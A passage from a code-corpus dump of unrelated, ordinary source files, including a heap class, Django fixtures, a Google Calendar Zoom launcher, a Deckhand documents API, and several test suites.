csvreader = csv.reader(csvfile, delimiter=',')
for row in csvreader:
students += row
return students
def parseStudentFiles(filename):
return os.listdir(filename)
def stringIsSubstringInArray(string, array):
for element in array:
if string in element or element in string:
return True
return False
def removeOverlap(toRemove, toCheckAgainst):
return list(filter(lambda x: not stringIsSubstringInArray(x, toCheckAgainst), toRemove))
def main():
if len(sys.argv) < 3:
printError("usage: python3 stylechecker.py PATH/TO/ROSTER/FILE PATH/TO/STUDENTS/DIRECTORY/")
rosterPath = sys.argv[1]
roster = parseRosterFile(rosterPath)
studentPath = sys.argv[2]
students = parseStudentFiles(studentPath)
rosterRemovedFromDirectory = removeOverlap(roster, students)
diretoryRemovedFromRoster = removeOverlap(students, roster)
if diretoryRemovedFromRoster:
print("Wrong Submission")
pprint(diretoryRemovedFromRoster)
if rosterRemovedFromDirectory:
print("Has Yet To Submit")
pprint(rosterRemovedFromDirectory)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1642219
|
<filename>infercnvpy/_util.py
import numpy as np
# Determine the right tqdm version, see https://github.com/tqdm/tqdm/issues/1082
try:
import ipywidgets # type: ignore # NOQA
from tqdm.auto import tqdm
except ModuleNotFoundError:
from tqdm import tqdm # NOQA
def _ensure_array(a):
"""If a is a matrix, turn it into an array."""
if isinstance(a, np.matrix):
return a.A
else:
return a
|
StarcoderdataPython
|
1752683
|
pessoas = {}
geral = []
sidade = media = 0
while True:
pessoas.clear()
pessoas['nome'] = str(input('Nome: ')).strip().upper()
while True:
pessoas['sexo'] = str(input('Sexo: [M/F] ')).strip().upper()[0]
if pessoas['sexo'] in 'MF':
break
print ('Digite apenas M ou F')
pessoas['idade'] = int(input('Idade: '))
sidade += pessoas['idade']
geral.append(pessoas.copy())
while True:
resp = str(input('Quer continuar? [S/N] ')).strip().upper()[0]
if resp in 'SN':
break
print ('Digite apenas S ou N')
if resp == 'N':
break
print ('-=' * 30)
print (f'A) Foram cadastradas {len(geral)} pessoas')
#print (geral)
media = sidade / len(geral)
print (f'B) A média de idade é {media} anos.')
print (f'C) As mulheres cadastradas foram: ', end='')
for p in geral:
if p['sexo'] == 'F':
print (f'{p["nome"]}...', end=' ')
print ()
print (f'D) Pessoas acima da média: ', end='')
for p in geral:
if p['idade'] > media:
print (f'{p["nome"]} com {p["idade"]} anos...', end='')
|
StarcoderdataPython
|
4826316
|
from pyquil.parser import parse
from pyquil.api._qac import AbstractCompiler
from pyquil import Program
def parse_equals(quil_string, *instructions):
expected = list(instructions)
actual = parse(quil_string)
assert expected == actual
class DummyCompiler(AbstractCompiler):
def get_version_info(self):
return {}
def quil_to_native_quil(self, program: Program, *, protoquil=None):
return program
def native_quil_to_executable(self, nq_program: Program):
return nq_program
|
StarcoderdataPython
|
1777878
|
class Heap:
def __init__(self, l):
self.tree = l
self.heapify()
def swap(self, idx1, idx2):
value1 = self.tree[idx1]
self.tree[idx1] = self.tree[idx2]
self.tree[idx2] = value1
# O(n)
def heapify(self):
last_parent_index = (len(self.tree) - 2) // 2
for i in range(last_parent_index, -1, -1):
self.shift_down(i)
# O(log(n))
def shift_up(self, current_idx):
if current_idx == 0:
return
parent_idx = (current_idx // 2) - 1
if self.tree[current_idx] >= self.tree[parent_idx]:
self.swap(current_idx, parent_idx)
self.shift_up(parent_idx)
# O(log(n))
def shift_down(self, current_idx):
left_idx = 2 * current_idx + 1
right_idx = 2 * current_idx + 2
largest_idx = current_idx
if left_idx < len(self.tree) and self.tree[left_idx] >= self.tree[largest_idx]:
largest_idx = left_idx
if right_idx < len(self.tree) and self.tree[right_idx] >= self.tree[largest_idx]:
largest_idx = right_idx
if largest_idx != current_idx:
self.swap(current_idx, largest_idx)
self.shift_down(largest_idx)
# O(log(n))
def insert(self, value):
self.tree.append(value)
self.shift_up(len(self.tree) - 1)
# O(log(n))
def pop(self) -> int:
if len(self.tree) == 0:
raise IndexError("The heap is empty")
value = self.tree[0]
self.tree[0] = self.tree[-1]
del self.tree[-1]
self.shift_down(0)
return value
def __iter__(self):
return iter(self.tree)
def __len__(self):
return len(self.tree)
|
StarcoderdataPython
|
3221972
|
<reponame>kuan0020/quickzoom<gh_stars>0
from __future__ import print_function
from datetime import timedelta
import datetime
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from webdriver_manager.chrome import ChromeDriverManager
from selenium import webdriver
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
SCOPES = ['https://www.googleapis.com/auth/calendar.readonly']
def convert_time(hour, min):
seconds = hour*60*60 + min*60
hr = seconds//3600
seconds %= 3600
mn = seconds//60
return (hr, mn)
def day_time_splitter(fulltime):
days = []
fulltime = fulltime.split('.')
exact_time = fulltime[1:3]
hr = int(exact_time[0])
mn = int(exact_time[1])
for n in range(len(fulltime[0])):
days.append(int(fulltime[0][n]))
(hr, mn) = convert_time(hr, mn)
return (days, hr, mn)
def is_tenMin_range(fulltime):
(day, hr, mn) = day_time_splitter(fulltime)
classtime = datetime.datetime.now().replace(hour=hr, minute=mn)
thres = 20
if mn-thres < 0:
after = datetime.datetime.now().replace(hour=hr, minute=mn+thres)
(hr, mn) = convert_time(hr, mn-thres)
before = datetime.datetime.now().replace(hour=hr, minute=mn)
elif mn+thres > 59:
before = datetime.datetime.now().replace(hour=hr, minute=mn-thres)
(hr, mn) = convert_time(hr, mn+thres)
after = datetime.datetime.now().replace(hour=hr, minute=mn)
else:
before = datetime.datetime.now().replace(hour=hr, minute=mn-thres)
after = datetime.datetime.now().replace(hour=hr, minute=mn+thres)
today = datetime.datetime.now().weekday()
if today in day and before <= datetime.datetime.now() <= after:
print('right time to zoom')
return True
def sliceLastOccur(string, char):
res = ''
i = 0
while(i < len(string)):
if(string[i] == char):
res = string[0:i]
i += 1
return res
def googleDatetimeConverter(dt):
dt = sliceLastOccur(dt, '-')
res = datetime.datetime.strptime(str(dt), '%Y-%m-%dT%H:%M:%S')
return res
def openZoom(zoomLink):
print(zoomLink)
ch_options = Options()
ch_options.add_argument('--no-sandbox')
### Type "chrome://version/" in google chrome and look for your profile path ###
ch_options.add_argument('user-data-dir=/path/to/chrome/profile/')
driver = webdriver.Chrome(ChromeDriverManager().install(), options=ch_options)
driver.get(zoomLink)
def gotZoom(link):
if 'zoom' in link:
return True
else:
return False
def googAuto(calendarId):
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
### follow this link https://developers.google.com/calendar/quickstart/python and enable google calendar API to get your credentials.json ###
flow = InstalledAppFlow.from_client_secrets_file('/path/to/google/calendar/credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('calendar', 'v3', credentials=creds)
# Call the Calendar API
now = datetime.datetime.now().isoformat() + 'Z' # 'Z' indicates UTC time
nowdt = datetime.datetime.now()
nowDatetime = datetime.datetime.strptime(nowdt.isoformat(), '%Y-%m-%dT%X.%f')
maxtime = datetime.datetime.utcnow().replace(hour=23, minute=59, second=0).isoformat() + 'Z'
print("Getting today's Zoom meetings..")
events_result = service.events().list(calendarId=calendarId, timeMin=now, timeMax=maxtime, maxResults=10, singleEvents=True, orderBy='startTime').execute()
events = events_result.get('items', [])
timenow = datetime.datetime.now()
meetings = []
meetings_list = []
dummy_dict = {'name': 'sample_name', 'startTime': 'sample_time', 'link': 'sample_link'}
if not events:
print('No upcoming Zooms found for today.')
print("Today's events: ")
for event in events:
loc = event.get('location')
if 'location' in event and gotZoom(loc):
meetings = dummy_dict.copy()
start = event['start'].get('dateTime')
if start != None:
pass
else:
start = event['originalStartTime'].get('dateTime')
start = googleDatetimeConverter(start)
name = event['summary']
meetings['name'] = name
meetings['startTime'] = start
meetings['link'] = event.get('location')
print(meetings['name'])
meetings_list.append(meetings)
timeThres = datetime.timedelta(minutes=20)
res = False
for i in meetings_list:
if ((i['startTime'] - timeThres) <= timenow <= (i['startTime'] + timeThres) and gotZoom(i['link'])):
print('Starting', i['name'], '...')
openZoom(i['link'])
res = True
break
else:
pass
if res is False:
print('no zooms now')
time.sleep(1)
print('Done')
time.sleep(0.5)
googAuto('primary')
|
StarcoderdataPython
|
4838555
|
<filename>newlog.py
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__)
str1 = []
@app.route('/input')
def input():
return render_template('input.html')
@app.route('/log', methods=['POST'])
def log():
user = request.form['name']
str1.append(user)
return redirect(url_for('success'))
@app.route('/success')
def success():
print(str1)
return render_template('success.html', names = str1)
if __name__ == '__main__':
app.run(host='localhost', port=8080, debug='True')
|
StarcoderdataPython
|
3368462
|
<reponame>swipswaps/signalfx-agent<filename>tests/monitors/telegraf_statsd/telegraf_statsd_test.py<gh_stars>1-10
import re
import time
from functools import partial as p
import pytest
from tests.helpers.agent import Agent
from tests.helpers.assertions import has_datapoint_with_dim, has_datapoint_with_metric_name, regex_search_matches_output
from tests.helpers.util import send_udp_message, wait_for
pytestmark = [pytest.mark.windows, pytest.mark.telegraf_statsd, pytest.mark.telegraf]
# regex used to scrape the address and port that dogstatsd is listening on
STATSD_RE = re.compile(r"(?<=listener listening on:(?=(\s+)(?=(\d+.\d+.\d+.\d+)\:(\d+))))")
MONITOR_CONFIG = """
monitors:
- type: telegraf/statsd
protocol: udp
serviceAddress: "127.0.0.1:0"
parseDataDogTags: true
metricSeparator: '.'
"""
def test_telegraf_statsd():
with Agent.run(MONITOR_CONFIG) as agent:
# wait until the statsd plugin logs the address and port it is listening on
assert wait_for(p(regex_search_matches_output, agent.get_output, STATSD_RE.search))
# scrape the host and port that the statsd plugin is listening on
regex_results = STATSD_RE.search(agent.output)
host = regex_results.groups()[1]
port = int(regex_results.groups()[2])
# send datapoints to the statsd listener
for _ in range(0, 10):
send_udp_message(host, port, "statsd.test.metric:55555|g|#dimension1:value1,dimension2:value2")
time.sleep(1)
# wait for fake ingest to receive the statsd metrics
assert wait_for(p(has_datapoint_with_metric_name, agent.fake_services, "statsd.test.metric"))
assert wait_for(
p(has_datapoint_with_dim, agent.fake_services, "dimension1", "value1")
), "datapoint didn't have datadog tag"
# send datapoints to the statsd listener
for _ in range(0, 10):
send_udp_message(host, port, "dogstatsd.test.metric:55555|g|#dimension1:,dimension2:value2")
time.sleep(1)
assert wait_for(
p(has_datapoint_with_metric_name, agent.fake_services, "dogstatsd.test.metric")
), "didn't report metric with valueless datadog tag"
|
StarcoderdataPython
|
3304856
|
# blank lines are not displayed
import csv
with open('compresult.csv',"r",newline='\r\n') as fhObj:
cReader = csv.reader(fhObj)
for rec in cReader:
print(rec)
|
StarcoderdataPython
|
184471
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 31 17:25:51 2017
@author: misaka-wa
"""
# <Test> [preprocessing::BioParser]
from preprocess.BioParser import bio_parse
dataframe = bio_parse('./dssp/sources/1a00.dssp')
AA = dataframe.AA.map(lambda x:x.replace(' ', '')) # amino acid
Structure = dataframe.STRUCTURE # secondary structure
# <Test> [research::cython::n_gram], [research::n_gram]
from research.n_gram import make_gram
import numpy as np
x = np.array([1,2,3,4,5])
make_gram(x, 2)
# n_gram
cases = np.array([AA, Structure]).T
res = [each_gram.T.flatten() for each_gram in make_gram(cases, 5)]
from research.specific_regular import specific_report
frequency = specific_report(res, {1:'A', 2:'A'})
print(frequency.values())
|
StarcoderdataPython
|
3320109
|
from django.core.management.base import BaseCommand
from django.db import transaction
from core.models import CategoryCampaing, TagCampaing
from core.models import Campaing, Like, News
from core.models import Reward, Payment, User, Raised
from core.models import Comment, SubComment, Currency
class Command(BaseCommand):
help = 'create campaings'
def success(self, message):
return self.stdout.write(
self.style.SUCCESS(message)
)
def warning(self, warning):
return self.stdout.write(
self.style.WARNING(warning)
)
def error(self, error):
return self.stdout.write(
self.style.ERROR(error)
)
def handle(self, *args, **options):
self.warning(
'if something goes wrong after fixtures installations,\
pelase use: python manage.py flush.'
)
with transaction.atomic():
"""get a categories"""
category_1 = CategoryCampaing.objects.get(id=1)
category_2 = CategoryCampaing.objects.get(id=2)
"""get users"""
user_creator_1 = User.objects.get(email='<EMAIL>')
user_creator_2 = User.objects.get(email='<EMAIL>')
user_contributor_1 = User.objects.get(email='<EMAIL>')
user_contributor_2 = User.objects.get(email='<EMAIL>')
currency_one = Currency.objects.get(id=1)
"""create tags"""
tag_1 = TagCampaing.objects.create(
name='Innovacion',
slug='innovacion'
)
tag_2 = TagCampaing.objects.create(
name='Nueva Tecnologia',
slug='nueva-tecnologia'
)
tag_3 = TagCampaing.objects.create(
name='Emprendiendo',
slug='emprendiendo'
)
self.success('tags created')
"""create campaing"""
campaing_1 = Campaing.objects.create(
title='first campaing',
slug='first-campaing',
city='Bolivia Santa Cruz',
budget=100,
qty_days=50,
facebook='facebook.com/firts1',
twitter='twitter.com/first1',
linkedin='linkedin.com/first1',
instagram='instagram.com/first1',
website='first1.com',
video='https://www.youtube.com/watch?v=DCCDKQH7BmA',
excerpt='this is a excerpt for this campaibng.',
description='this is a lot description for this campaing',
public_at='2020-12-03 12:52:00',
status_campaing=1,
is_complete=False,
user=user_creator_1,
currencies=currency_one,
category=category_1
)
campaing_1.tags.add(tag_1, tag_3)
campaing_2 = Campaing.objects.create(
title='second campaing',
slug='second-campaing',
city='Bolivia La Paz',
budget=300,
qty_days=50,
facebook='facebook.com/firts2',
twitter='twitter.com/first2',
linkedin='linkedin.com/first2',
instagram='instagram.com/first2',
website='first2.com',
video='https://www.youtube.com/watch?v=DCCDKQH7BmA',
excerpt='this is a excerpt for this campaibng.',
description='this is a lot description for this campaing',
public_at='2020-10-05 12:52:00',
status_campaing=1,
is_complete=False,
user=user_creator_2,
currencies=currency_one,
category=category_2,
)
campaing_2.tags.add(tag_2, tag_1)
self.success('campaing created.')
"""create likes"""
like_one = Like.objects.create(
liked=True,
user=user_contributor_1,
campaing=campaing_1
)
like_two = Like.objects.create(
liked=True,
user=user_contributor_1,
campaing=campaing_2
)
like_three = Like.objects.create(
liked=True,
user=user_contributor_2,
campaing=campaing_1
)
self.success('likes created.')
"""create rewards"""
reward_one = Reward.objects.create(
title='reward camp 1',
price=12.50,
delivery_data='2020-02-20 12:45',
delivery_place='somewhere',
description='somewhere',
campaing=campaing_1,
currencies=currency_one
)
reward_two = Reward.objects.create(
title='reward camp 1',
price=123.50,
delivery_data='2020-05-20 12:45',
delivery_place='somewhere',
description='somewhere',
campaing=campaing_1,
currencies=currency_one
)
reward_three = Reward.objects.create(
title='reward camp 2',
price=912.50,
delivery_data='2020-06-22 12:45',
delivery_place='somewhere',
description='somewhere',
campaing=campaing_2,
currencies=currency_one
)
reward_four = Reward.objects.create(
title='reward camp 2',
price=668.50,
delivery_data='2020-07-21 12:45',
delivery_place='somewhere',
description='somewhere',
campaing=campaing_2,
currencies=currency_one
)
self.success('rewards created.')
"""create payments"""
payment_one = Payment.objects.create(
name='paypal',
campaing=campaing_1,
reward=reward_one,
user=user_contributor_1,
type_payment=1,
status_payment=3,
budget_partial=reward_one.price,
currencies=currency_one
)
payment_two = Payment.objects.create(
name='paypal',
campaing=campaing_1,
reward=reward_two,
user=user_contributor_1,
type_payment=1,
status_payment=3,
budget_partial=reward_two.price,
currencies=currency_one
)
payment_three = Payment.objects.create(
name='paypal',
campaing=campaing_2,
reward=reward_three,
user=user_contributor_1,
type_payment=1,
status_payment=2,
budget_partial=reward_three.price,
currencies=currency_one
)
self.success('payment created.')
"""news related a campaing"""
news_1 = News.objects.create(
title="some title",
description="some description about campaing.",
campaing=campaing_1
)
news_2= News.objects.create(
title="some title two",
description="some two description about campaing.",
campaing=campaing_1
)
news_3= News.objects.create(
title="some title three",
description="some three description about campaing.",
campaing=campaing_1
)
self.success('news created.')
"""comment about campaing"""
comment_1 = Comment.objects.create(
description="some comments about campaing.",
created_at="2019-10-5 12:15",
user=user_contributor_1
)
comment_2 = Comment.objects.create(
description="some two comments about campaing.",
created_at="2019-10-5 12:15",
user=user_contributor_1
)
self.success('comments created.')
"""subcomment about comment"""
sub_comment_1_1 = SubComment.objects.create(
description="some answer about comment.",
created_at="2019-5-5 12:23",
comment=comment_1
)
sub_comment_1_2 = SubComment.objects.create(
description="some two answer about comment.",
created_at="2019-5-5 12:23",
comment=comment_1
)
sub_comment_2_1 = SubComment.objects.create(
description="some answer about comment above.",
created_at="2019-6-5 12:12",
comment=comment_2
)
|
StarcoderdataPython
|
151592
|
# Generated by Django 4.0 on 2022-06-14 17:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('evernote', '0009_note_tag_delete_notehastag'),
]
operations = [
migrations.RenameField(
model_name='note',
old_name='tag',
new_name='tags',
),
]
|
StarcoderdataPython
|
1788001
|
# Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import falcon
from oslo_log import log as logging
import six
from deckhand.control import base as api_base
from deckhand.control import common
from deckhand.control.views import document as document_view
from deckhand.db.sqlalchemy import api as db_api
from deckhand.engine import document_validation
from deckhand.engine import layering
from deckhand import errors
from deckhand import policy
from deckhand import types
from deckhand import utils
LOG = logging.getLogger(__name__)
class RevisionDocumentsResource(api_base.BaseResource):
"""API resource for realizing revision documents endpoint."""
view_builder = document_view.ViewBuilder()
@policy.authorize('deckhand:list_cleartext_documents')
@common.sanitize_params([
'schema', 'metadata.name', 'metadata.layeringDefinition.abstract',
'metadata.layeringDefinition.layer', 'metadata.label',
'status.bucket', 'order', 'sort'])
def on_get(self, req, resp, sanitized_params, revision_id):
"""Returns all documents for a `revision_id`.
Returns a multi-document YAML response containing all the documents
matching the filters specified via query string parameters. Returned
documents will be as originally posted with no substitutions or
layering applied.
"""
include_encrypted = policy.conditional_authorize(
'deckhand:list_encrypted_documents', req.context, do_raise=False)
order_by = sanitized_params.pop('order', None)
sort_by = sanitized_params.pop('sort', None)
filters = sanitized_params.copy()
filters['metadata.storagePolicy'] = ['cleartext']
if include_encrypted:
filters['metadata.storagePolicy'].append('encrypted')
filters['deleted'] = False # Never return deleted documents to user.
try:
documents = db_api.revision_documents_get(
revision_id, **filters)
except errors.RevisionNotFound as e:
LOG.exception(six.text_type(e))
raise falcon.HTTPNotFound(description=e.format_message())
# Sorts by creation date by default.
documents = utils.multisort(documents, sort_by, order_by)
resp.status = falcon.HTTP_200
resp.body = self.view_builder.list(documents)
class RenderedDocumentsResource(api_base.BaseResource):
"""API resource for realizing rendered documents endpoint.
Rendered documents are also revision documents, but unlike revision
documents, they are finalized documents, having undergone secret
substitution and document layering.
Returns a multi-document YAML response containing all the documents
matching the filters specified via query string parameters. Returned
documents will have secrets substituted into them and be layered with
other documents in the revision, in accordance with the ``LayeringPolicy``
that currently exists in the system.
"""
view_builder = document_view.ViewBuilder()
@policy.authorize('deckhand:list_cleartext_documents')
@common.sanitize_params([
'schema', 'metadata.name', 'metadata.label', 'status.bucket', 'order',
'sort'])
def on_get(self, req, resp, sanitized_params, revision_id):
include_encrypted = policy.conditional_authorize(
'deckhand:list_encrypted_documents', req.context, do_raise=False)
filters = {
'metadata.storagePolicy': ['cleartext'],
'deleted': False
}
if include_encrypted:
filters['metadata.storagePolicy'].append('encrypted')
documents = self._retrieve_documents_for_rendering(revision_id,
**filters)
substitution_sources = self._retrieve_substitution_sources()
try:
# NOTE(fmontei): `validate` is False because documents have already
# been pre-validated during ingestion. Documents are post-validated
# below, regardless.
document_layering = layering.DocumentLayering(
documents, substitution_sources, validate=False)
rendered_documents = document_layering.render()
except (errors.InvalidDocumentLayer,
errors.InvalidDocumentParent,
errors.IndeterminateDocumentParent,
errors.MissingDocumentKey,
errors.UnsupportedActionMethod) as e:
raise falcon.HTTPBadRequest(description=e.format_message())
except (errors.LayeringPolicyNotFound,
errors.SubstitutionSourceNotFound) as e:
raise falcon.HTTPConflict(description=e.format_message())
except errors.errors.UnknownSubstitutionError as e:
raise falcon.HTTPInternalServerError(
description=e.format_message())
# Filters to be applied post-rendering, because many documents are
# involved in rendering. User filters can only be applied once all
# documents have been rendered. Note that `layering` module only
# returns concrete documents, so no filtering for that is needed here.
order_by = sanitized_params.pop('order', None)
sort_by = sanitized_params.pop('sort', None)
user_filters = sanitized_params.copy()
rendered_documents = [
d for d in rendered_documents if utils.deepfilter(
d, **user_filters)]
if sort_by:
rendered_documents = utils.multisort(
rendered_documents, sort_by, order_by)
resp.status = falcon.HTTP_200
resp.body = self.view_builder.list(rendered_documents)
self._post_validate(rendered_documents)
def _retrieve_documents_for_rendering(self, revision_id, **filters):
"""Retrieve all necessary documents needed for rendering. If a layering
policy isn't found in the current revision, retrieve it in a subsequent
call and add it to the list of documents.
"""
try:
documents = db_api.revision_documents_get(revision_id, **filters)
except errors.RevisionNotFound as e:
LOG.exception(six.text_type(e))
raise falcon.HTTPNotFound(description=e.format_message())
if not any([d['schema'].startswith(types.LAYERING_POLICY_SCHEMA)
for d in documents]):
try:
layering_policy_filters = {
'deleted': False,
'schema': types.LAYERING_POLICY_SCHEMA
}
layering_policy = db_api.document_get(
**layering_policy_filters)
except errors.DocumentNotFound as e:
LOG.exception(e.format_message())
else:
documents.append(layering_policy)
return documents
def _retrieve_substitution_sources(self):
# Return all concrete documents as potential substitution sources.
return db_api.document_get_all(
**{'metadata.layeringDefinition.abstract': False})
def _post_validate(self, rendered_documents):
# Perform schema validation post-rendering to ensure that rendering
# and substitution didn't break anything.
data_schemas = db_api.revision_documents_get(
schema=types.DATA_SCHEMA_SCHEMA, deleted=False)
doc_validator = document_validation.DocumentValidation(
rendered_documents, data_schemas)
try:
validations = doc_validator.validate_all()
except errors.InvalidDocumentFormat as e:
LOG.error('Failed to post-validate rendered documents.')
LOG.exception(e.format_message())
raise falcon.HTTPInternalServerError(
description=e.format_message())
else:
failed_validations = [
v for v in validations if v['status'] == 'failure']
if failed_validations:
raise falcon.HTTPBadRequest(description=failed_validations)
|
StarcoderdataPython
|
3212878
|
<gh_stars>0
from SLIX.toolbox import *
class TestToolbox:
def test_all_peaks(self):
# Create an absolute simple peak array
arr = numpy.array([0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0])
real_peaks = numpy.argwhere(arr == 1).flatten()
toolbox_peaks = all_peaks(arr, cut_edges=False)
assert numpy.all(toolbox_peaks == real_peaks)
# cut_edges should remove the peak position 1
toolbox_peaks = all_peaks(arr)
assert numpy.all(toolbox_peaks == real_peaks[1:])
def test_peak_positions(self):
# Create an absolute simple peak array
arr = numpy.array([0, 1, 0, 0.07, 0, 1, 0, 0.07, 0, 1, 0])
# Test if high and low prominence separation is working as intended
high_peaks = numpy.argwhere(arr == 1).flatten()
low_peaks = numpy.argwhere(arr == 0.07).flatten()
toolbox_peaks = all_peaks(arr, cut_edges=False)
toolbox_high_peaks = accurate_peak_positions(toolbox_peaks, arr, centroid_calculation=False)
toolbox_low_peaks = accurate_peak_positions(toolbox_peaks, arr, low_prominence=0, high_prominence=TARGET_PROMINENCE,
centroid_calculation=False)
assert numpy.all(high_peaks == toolbox_high_peaks)
assert numpy.all(low_peaks == toolbox_low_peaks)
def test_peakdistance(self):
test_arr = numpy.array([0, 0, 1, 0, 0, 0, 0, 1, 0] + [0] * 15)
expected_distance = 75
toolbox_peaks = all_peaks(test_arr, cut_edges=False)
toolbox_distance = peakdistance(toolbox_peaks, 24)
assert toolbox_distance == expected_distance
def test_prominence(self):
# Create an absolute simple peak array
test_arr = numpy.array([0, 1, 0, 0.1, 0, 1, 0, 0.1, 0, 1, 0])
comparison = normalize(test_arr, kind_of_normalization=1)
toolbox_peaks = all_peaks(test_arr, cut_edges=False)
toolbox_prominence = prominence(toolbox_peaks, test_arr,)
assert numpy.isclose(toolbox_prominence, numpy.mean(comparison[comparison > 0]))
def test_peakwidth(self):
test_arr = numpy.array([0, 0.5, 1, 0.5, 0] + [0] * 19)
expected_width = 30
toolbox_peaks = all_peaks(test_arr, cut_edges=False)
toolbox_width = peakwidth(toolbox_peaks, test_arr, 24)
assert toolbox_width == expected_width
def test_crossing_direction(self):
# Test for one direction with 180°+-35° distance
two_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
expected_direction = numpy.array([135, BACKGROUND_COLOR, BACKGROUND_COLOR])
peaks = all_peaks(two_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, two_peak_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(two_peak_arr))
assert numpy.all(expected_direction == toolbox_direction)
# Test for two directions with 180°+-35° distance
four_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0])
expected_direction = numpy.array([135, 60, BACKGROUND_COLOR])
peaks = all_peaks(four_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, four_peak_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(two_peak_arr))
assert numpy.all(expected_direction == toolbox_direction)
# Test for three directions with 180°+-35° distance
six_peak_arr = numpy.array([0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0])
expected_direction = numpy.array([135, 105, 60])
peaks = all_peaks(six_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, six_peak_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(two_peak_arr))
assert numpy.all(expected_direction == toolbox_direction)
# Test for angle outside of 180°+-35° distance
error_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0])
expected_direction = numpy.array([82.5, BACKGROUND_COLOR, BACKGROUND_COLOR])
peaks = all_peaks(error_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, error_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(error_arr))
assert numpy.all(expected_direction == toolbox_direction)
error_arr = numpy.array([0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0])
expected_direction = numpy.array([BACKGROUND_COLOR, BACKGROUND_COLOR, 60])
peaks = all_peaks(error_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, error_arr, centroid_calculation=False)
toolbox_direction = crossing_direction(high_peaks, len(error_arr))
assert numpy.all(expected_direction == toolbox_direction)
def test_non_crossing_direction(self):
# Test for one peak
one_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
expected_direction = 45
peaks = all_peaks(one_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, one_peak_arr, centroid_calculation=False)
toolbox_direction = non_crossing_direction(high_peaks, len(one_peak_arr))
assert expected_direction == toolbox_direction
# Test for two peaks
two_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
expected_direction = 135
peaks = all_peaks(two_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, two_peak_arr, centroid_calculation=False)
toolbox_direction = non_crossing_direction(high_peaks, len(two_peak_arr))
assert expected_direction == toolbox_direction
# Test for four peaks
four_peak_arr = numpy.array([0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0])
expected_direction = BACKGROUND_COLOR
peaks = all_peaks(four_peak_arr, cut_edges=False)
high_peaks = accurate_peak_positions(peaks, four_peak_arr, centroid_calculation=False)
toolbox_direction = non_crossing_direction(high_peaks, len(two_peak_arr))
assert expected_direction == toolbox_direction
def test_centroid_correction(self):
# simple test case: one distinct peak
test_array = numpy.array([0] * 9 + [1] + [0] * 14)
test_high_peaks = numpy.array([9])
expected_centroid = numpy.array([9])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert expected_centroid == toolbox_centroid
# simple test case: one distinct peak
test_array = numpy.array([0] * 8 + [0.5, 1, 0.5] + [0] * 13)
test_high_peaks = numpy.array([9])
expected_centroid = numpy.array([9])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert expected_centroid == toolbox_centroid
# simple test case: centroid is between two measurements
test_array = numpy.array([0] * 8 + [1, 1] + [0] * 14)
test_high_peaks = numpy.array([8])
expected_centroid = numpy.array([8.5])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert expected_centroid == toolbox_centroid
# more complicated test case: wide peak plateau
test_array = numpy.array([0] * 8 + [1, 1, 1] + [0] * 13)
test_high_peaks = numpy.array([8])
expected_centroid = numpy.array([9])
toolbox_centroid = centroid_correction(test_array, test_high_peaks)
assert numpy.isclose(expected_centroid, toolbox_centroid, 1e-2, 1e-2)
def test_create_background_mask(self):
test_array = (numpy.random.random(10000) * 256).astype('int')
expected_results = test_array < 10
toolbox_mask = create_background_mask(test_array[..., numpy.newaxis])
assert numpy.all(expected_results == toolbox_mask)
def test_normalize(self):
